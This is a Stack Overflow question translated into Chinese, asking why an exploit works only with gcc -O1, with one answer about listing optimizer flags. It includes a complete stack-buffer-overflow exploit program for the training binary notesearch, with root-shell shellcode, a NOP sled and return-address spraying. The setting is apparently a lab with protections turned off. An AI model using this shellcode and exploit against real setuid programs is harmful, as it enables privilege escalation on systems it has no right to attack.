gcc:使用-O1和拼写-O1选项导致不同的结果(一个工作;一个不工作)

gno*_*ule 5 c stack-overflow assembly gcc compiler-optimization

在处理堆栈溢出时,我注意到只有在使用'-O1'编译它时才有效.为了了解哪个选项负责差异,我手动输入-O1选项(取自我的版本的页面,这与我在检查man gcc机器时找到的内容一致).但是,该程序再次无效.

我确实注意到在编译之后这可能没有用的警告输出-O1:
exploit_notesearch.c:31:10: warning: ignoring return value of ‘system’, declared with attribute warn_unused_result [-Wunused-result].

有任何想法吗?其他人在旧的SO问题中指出了差异,但仍然没有得到解决.

数据:
- Ubuntu 12.04
- gcc 4.6.3.
- x86 32位
- 一个C程序

注意:关于溢出工作,我已经禁用了我可以防止溢出的一切(金丝雀,ASLR,execstack,堆栈对齐).

代码(可能与问题无关).这个函数调用我可以发布的另一个 但我不认为它应该重要(将根据要求):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}
Run Code Online (Sandbox Code Playgroud)

cre*_*hen 2

您可以通过运行打印出 gcc 实际使用的优化

gcc -Q -O0 --help=optimizers
Run Code Online (Sandbox Code Playgroud)

(或任何其他优化级别而不是-O0)。